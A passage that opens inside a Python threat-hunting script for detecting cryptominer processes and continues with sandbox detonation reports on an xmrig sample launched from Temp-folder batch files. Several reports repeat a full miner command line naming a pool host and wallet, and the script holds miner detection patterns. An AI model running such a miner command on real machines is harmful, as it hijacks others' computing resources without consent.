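    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def split_pool(url: str) -> tuple[str, Optional[int]]:
    """Drop an optional stratum+tcp:// scheme and split host:port."""
    url = re.sub(r"^[a-z+]+://", "", url, flags=re.I)
    host, sep, port = url.rpartition(":")
    return (host, int(port)) if sep and port.isdigit() else (url, None)


def parse_miner_args(cmdline: str) -> Optional[MinerIoc]:
    """Return pool/wallet/algo IoCs if the line looks like a miner, else None.
    A pool URL alone is not enough: a wallet or algorithm must also be present,
    so tools that merely share a flag letter (svchost -k, -p) stay quiet."""
    tokens = tokenize(cmdline)
    found: dict = {}
    i = 1  # tokens[0] is the image
    while i < len(tokens):
        flag, eq, inline = tokens[i].partition("=")
        if flag in VALUE_FLAGS:
            if eq:
                found[VALUE_FLAGS[flag]] = inline
            elif i + 1 < len(tokens):
                found[VALUE_FLAGS[flag]] = tokens[i + 1]
                i += 1
        elif tokens[i] in BOOL_FLAGS:
            found["keepalive"] = True
        i += 1
    if "pool" not in found or not ("wallet" in found or "algo" in found):
        return None
    host, port = split_pool(found["pool"])
    return MinerIoc(host, port, found.get("wallet"), found.get("algo"), found.get("keepalive", False))


def extract_batch_launcher(cmdline: str) -> Optional[str]:
    """For cmd.exe /c|/k "<script>.bat|.cmd" return the script path, else None."""
    tokens = tokenize(cmdline)
    if not tokens or not tokens[0].lower().endswith("cmd.exe"):
        return None
    for flag, arg in zip(tokens[1:], tokens[2:]):
        if flag.lower() in ("/c", "/k") and arg.lower().endswith((".bat", ".cmd")):
            return arg
    return None


def assess(event: dict) -> dict:
    image = event["image"].rsplit("\\", 1)[-1].lower()
    reasons = []
    ioc = parse_miner_args(event["cmdline"])
    if ioc:
        reasons.append(f"miner args: pool {ioc.pool_host}:{ioc.pool_port}, algo {ioc.algo}")
    if "SeLockMemoryPrivilege" in event.get("privileges", ()) and image not in LOCK_MEMORY_ALLOWLIST:
        reasons.append("SeLockMemoryPrivilege requested by non-allow-listed image")
    bat = extract_batch_launcher(event["cmdline"])
    if bat and "\\appdata\\local\\temp\\" in bat.lower():
        reasons.append(f"batch launcher run from user temp: {bat}")
    verdict = "miner" if ioc else ("suspicious" if reasons else "benign")
    return {"pid": event["pid"], "verdict": verdict, "reasons": reasons, "ioc": ioc}


# Constructed events. PIDs 3568/4316 carry the command lines recorded in the
# report; 1001 and 1002 are invented negatives (flag collision, allow-listed).
SAMPLE_EVENTS = [
    {"pid": 3568, "image": r"C:\Windows\system32\cmd.exe", "privileges": [],
     "cmdline": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (6).bat"'},
    {"pid": 4316, "image": r"C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe", "privileges": ["SeLockMemoryPrivilege"],
     "cmdline": "xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k"},
    {"pid": 1001, "image": r"C:\Windows\System32\svchost.exe", "privileges": [],
     "cmdline": "svchost.exe -k netsvcs -p"},
    {"pid": 1002, "image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "privileges": ["SeLockMemoryPrivilege"], "cmdline": "sqlservr.exe -sMSSQLSERVER"},
]


def hunt(events: list[dict]) -> list[dict]:
    return [r for r in map(assess, events) if r["verdict"] != "benign"]


if __name__ == "__main__":
    for r in hunt(SAMPLE_EVENTS):
        print(r["pid"], r["verdict"], "; ".join(r["reasons"]))
```

Running `hunt(SAMPLE_EVENTS)` flags PID 4316 as a miner (pool us-zephyr.miningocean.org:5332, algorithm rx/0, plus the privilege request) and PID 3568 as suspicious for running a batch file out of the user's Temp directory, while the svchost and SQL Server negatives stay quiet. The wallet string and pool host are the durable pivots here; the .bat file names vary between runs (zephyr.bat, zephyr - Copie (3).bat, ...) and should not be keyed on.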
Analysis: behavioral13
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win10ltsc2021-20241023-en
Max time kernel
1154s
Max time network
1173s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 320 wrote to memory of 4536 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 320 wrote to memory of 4536 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (7).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| NL | 20.103.156.88:443 | fd.api.iris.microsoft.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.162.46.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/4536-0-0x000001D434450000-0x000001D434470000-memory.dmp
memory/4536-1-0x000001D435D40000-0x000001D435D60000-memory.dmp
memory/4536-3-0x000001D435D80000-0x000001D435DA0000-memory.dmp
memory/4536-2-0x000001D435D60000-0x000001D435D80000-memory.dmp
memory/4536-5-0x000001D435D80000-0x000001D435DA0000-memory.dmp
memory/4536-4-0x000001D435D60000-0x000001D435D80000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win11-20241007-en
Max time kernel
435s
Max time network
1160s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
memory/2796-0-0x00000261D06D0000-0x00000261D06F0000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win10ltsc2021-20241023-en
Max time kernel
743s
Max time network
1196s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 6004 wrote to memory of 1592 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 6004 wrote to memory of 1592 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (4).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.240.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
Files
memory/1592-0-0x0000020C11F00000-0x0000020C11F20000-memory.dmp
memory/1592-1-0x0000020C11F50000-0x0000020C11F70000-memory.dmp
memory/1592-2-0x0000020C13920000-0x0000020C13940000-memory.dmp
memory/1592-3-0x0000020C13940000-0x0000020C13960000-memory.dmp
memory/1592-4-0x0000020C13920000-0x0000020C13940000-memory.dmp
memory/1592-5-0x0000020C13940000-0x0000020C13960000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win11-20241007-en
Max time kernel
739s
Max time network
1188s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3796 wrote to memory of 2324 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 3796 wrote to memory of 2324 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (7).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/2324-0-0x00000225EB9B0000-0x00000225EB9D0000-memory.dmp
memory/2324-1-0x00000225ED2E0000-0x00000225ED300000-memory.dmp
memory/2324-3-0x00000225ED320000-0x00000225ED340000-memory.dmp
memory/2324-2-0x00000225ED300000-0x00000225ED320000-memory.dmp
memory/2324-5-0x00000225ED320000-0x00000225ED340000-memory.dmp
memory/2324-4-0x00000225ED300000-0x00000225ED320000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win10ltsc2021-20241023-en
Max time kernel
738s
Max time network
1188s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3356 wrote to memory of 2608 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 3356 wrote to memory of 2608 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr.bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| IE | 20.223.36.55:443 | fd.api.iris.microsoft.com | tcp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/2608-0-0x00000156E33F0000-0x00000156E3410000-memory.dmp
memory/2608-1-0x00000156E3440000-0x00000156E3460000-memory.dmp
memory/2608-2-0x00000156E3460000-0x00000156E3480000-memory.dmp
memory/2608-3-0x00000156E3480000-0x00000156E34A0000-memory.dmp
memory/2608-4-0x00000156E3460000-0x00000156E3480000-memory.dmp
memory/2608-5-0x00000156E3480000-0x00000156E34A0000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win10ltsc2021-20241023-en
Max time kernel
737s
Max time network
1199s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4284 wrote to memory of 116 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 4284 wrote to memory of 116 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (3).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/116-0-0x000001E97AFA0000-0x000001E97AFC0000-memory.dmp
memory/116-1-0x000001E97CA70000-0x000001E97CA90000-memory.dmp
memory/116-2-0x000001E97CA90000-0x000001E97CAB0000-memory.dmp
memory/116-3-0x000001E97CAB0000-0x000001E97CAD0000-memory.dmp
memory/116-5-0x000001E97CAB0000-0x000001E97CAD0000-memory.dmp
memory/116-4-0x000001E97CA90000-0x000001E97CAB0000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win11-20241007-en
Max time kernel
1170s
Max time network
1188s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1392 wrote to memory of 4068 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 1392 wrote to memory of 4068 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (3).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/4068-0-0x000001EAAB2E0000-0x000001EAAB300000-memory.dmp
memory/4068-1-0x000001EB3ED60000-0x000001EB3ED80000-memory.dmp
memory/4068-3-0x000001EB3F3E0000-0x000001EB3F400000-memory.dmp
memory/4068-2-0x000001EB3F1A0000-0x000001EB3F1C0000-memory.dmp
memory/4068-4-0x000001EB3F1A0000-0x000001EB3F1C0000-memory.dmp
memory/4068-5-0x000001EB3F3E0000-0x000001EB3F400000-memory.dmp